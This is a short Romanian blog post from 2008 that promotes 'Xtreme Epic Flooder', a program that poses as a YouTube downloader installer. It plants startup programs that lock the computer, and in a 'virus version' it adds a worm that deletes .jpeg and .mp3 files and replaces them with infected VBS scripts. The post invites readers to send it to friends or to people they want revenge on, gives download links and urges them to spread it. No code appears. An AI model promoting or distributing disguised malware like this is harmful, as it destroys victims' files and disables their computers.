rss

vineri, 18 aprilie 2008

Xtreme Epic Flooder - D3v!L1$h HaCk3r$

Xtreme Epic Flooder este o aplicatie dezvoltata de catre D3v!L1$h HaCk3r$ fiind creata de catre MonSoon...adik de yo :D
Putetzi sa-l trimiteti unui prieten daca vreti sa-i faceti o farsa sau cuiva pe care vreti sa va rezbunati[versiunea cu virus].
Acest program imita instalarea programului Zilla Tube folosit pentru a downloada cliputi de pe Youtube dar de fapt instaleaza cateva programe enervante in folderul Startup.La versiunea cu virus printre aceste programe se gaseste si un virus [Worm] care sterge fisierele .jpeg si .mp3 inlocuindule cu scripturi .VBS infectate.
La terminarea instalarii aplicatiei Xtreme Epic Flooder aceasta va opri calculatorul,iar la pornire toate programele din folderul startup vor porni si vor bloca calculatorul.Daca dati restart acestea oricum vor porni iar.
Pentru a scapa de Xtreme Epic Flooder trebuie ca la pornirea calculatorului,inainte de aparitia Boot Screen-ului apasati tasta F5 sau F8 si alegeti din meniul care se deschide optiunea Safe Mode.
Dupa incarcarea sistemului de operare in Safe Mode mergeti in folderul Startup [C:\Documents and Settings\All Users\Start Menu\Programs\Startup ] stergeti toate programele aflate acolo si dati restart.
Asta e tot...distractie placuta...

Download Xtreme Epic Flooder
Download Worm Xtreme Epic Flooder

Datzi shi voi mai departe programul si linkul acestei pagini la prieteni.


0 comentarii:

Trimiteți un comentariu